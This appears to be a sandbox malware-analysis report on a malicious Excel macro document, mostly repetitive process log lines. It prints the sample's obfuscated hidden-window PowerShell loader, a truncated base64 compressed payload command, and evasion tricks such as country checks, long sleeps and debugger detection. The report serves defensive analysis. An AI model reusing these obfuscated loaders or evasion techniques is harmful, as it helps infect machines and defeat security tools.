Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Document contains an embedded VBA which only executes on specific systems (country or language check)Show sources
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : a()opa = Application.International(xlCountrySetting) + 960
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : lace("" + Format(0, "currency"), "0", "")End FunctionFunc
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\h2oah0u7.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ua6j8io5.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3ndkwphw.dllJump to dropped file
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 216Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1900Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984Thread sleep time: -922337203685477s >= -30000s
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
